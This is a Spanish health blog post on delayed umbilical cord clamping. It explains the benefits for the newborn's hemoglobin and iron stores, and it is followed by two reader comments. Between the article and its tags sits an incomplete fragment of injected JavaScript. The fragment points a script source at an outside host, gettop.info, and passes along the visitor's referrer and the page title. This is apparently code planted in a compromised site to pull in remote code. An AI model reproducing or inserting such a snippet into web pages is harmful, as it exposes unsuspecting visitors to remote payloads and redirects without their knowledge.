Salud y belleza » Embarazo, Medicina, Niños, Salud

Cuándo hay que cortar el cordón umbilical

2 Comentarios

Hasta hace pocos años los médicos siempre aseguraban que lo ideal era cortar el cordón umbilical unos segundos después del nacimiento y no se prestaba más atención a ese asunto. Sin embargo, con el paso del tiempo las investigaciones han ido apuntando hacia otra dirección y defienden que es recomendable retrasar ese momento para poder disfrutar de más beneficios.

Actualmente, en las guías médicas se recomienda hacer un pinzamiento tardío del cordón umbilical, aunque no todos los centros ni los profesionales lo cumplen. Se recomienda cortar el cordón cuando éste deje de latir o a partir del segundo minuto tras el nacimiento. Este pinzamiento más tardío ayudaría a incrementar los niveles de hemoglobina y los depósitos de hierro del recién nacido, lo que ayudaría a reducir el riesgo de anemia.

cortar-cordon-umbilical

Al principio hubo cierta polémica respecto al tema porque había teorías que aseguraban que el pinzamiento tardío podría incrementar el riesgo de que la madre sufriera una hemorragia, pero tras realizar los estudios pertinentes se ha descartado esta teoría.

Sin embargo, los beneficios de esta práctica sí que han sido sobradamente demostrados. Aunque algunos médicos aseguran que hay que tener en cuenta primero las circunstancias de cada caso porque hay partos en los que no se puede esperar porque hay que llevar a cabo una atención activa del bebé.

¿Estás a favor del pinzamiento tardío del cordón?

if (document.currentScript) { s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , , ,

2 Comments »

  • carmina said:

    no sabía eso del cordón umbilical… todavía no soy madre pero cuando lo sea os digo que miraré cuándo se lo cortan.

  • fatima said:

    y cuando hay cesárea ocurre lo mismo¿?

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.